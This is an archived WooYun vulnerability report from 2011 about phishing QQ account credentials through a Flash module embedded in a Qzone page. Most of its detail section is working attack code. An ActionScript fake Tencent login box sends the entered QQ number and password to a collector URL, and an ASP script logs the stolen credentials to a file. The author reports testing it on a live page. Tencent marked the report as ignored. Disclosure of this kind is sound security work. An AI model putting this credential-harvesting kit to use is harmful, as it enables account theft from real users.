当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02532

漏洞标题:QQ空间flash钓鱼

相关厂商:腾讯

漏洞作者: only_guest

提交时间:2011-07-19 23:12

修复时间:2011-07-20 08:56

公开时间:2011-07-20 08:56

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-07-19: 细节已通知厂商并且等待厂商处理中
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

危害比较严重,今晚一无聊人事来社工我的时候发现的.可以钓鱼得到对方帐号密码.

详细说明:

QQ空间自定义模块,插入一个flash,flash做一个仿腾讯的登录框.flash里写如下动作

var str = "http://localhost/mail.asp";
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
if (!success)
{
msg.text = "错误:用户密码错误!";
}
else
{
msg.text = "错误:用户密码错误!";
} // end else if
gotoAndStop(4);
};
sub_btn.onRelease = function ()
{
var _loc1 = ntxt.text;
var _loc2 = ptxt.text;
if (_loc2.length > 5 && _loc1.length > 4)
{
scData.QQNumber = _loc1;
scData.QQPassWord = _loc2;
scData.sendAndLoad(str, scData, "get");
} // end if
if (_loc2.length < 6 || _loc1.length < 5)
{
ntxt.text = "";
ptxt.text = "";
} // end if
};
stop ();


mail.asp里写收信代码

<%
strLogFile="testqqhahaha.txt"
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
if QQNumber="" or QQPassWord="" then
response.write "哈哈哈哈"
response.end
End If
StrLogText=StrLogText&QQNumber&"----"&QQPassWord
StrLogText=StrLogText&"----"&date&" "&time
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(StrLogText)
ff.close
set ff=nothing
set f=nothing
response.write "嘿嘿嘿嘿!"
%>


漏洞证明:

http://user.qzone.qq.com/5447055
提交了,俺就收到了...
我只是为了提交漏洞做的演示,腾讯官方可别给俺QQ封了...

修复方案:

你们比我专业...

版权声明:转载请注明来源 only_guest@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-07-20 08:56

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

漏洞Rank:2 (WooYun评价)

最新状态:

暂无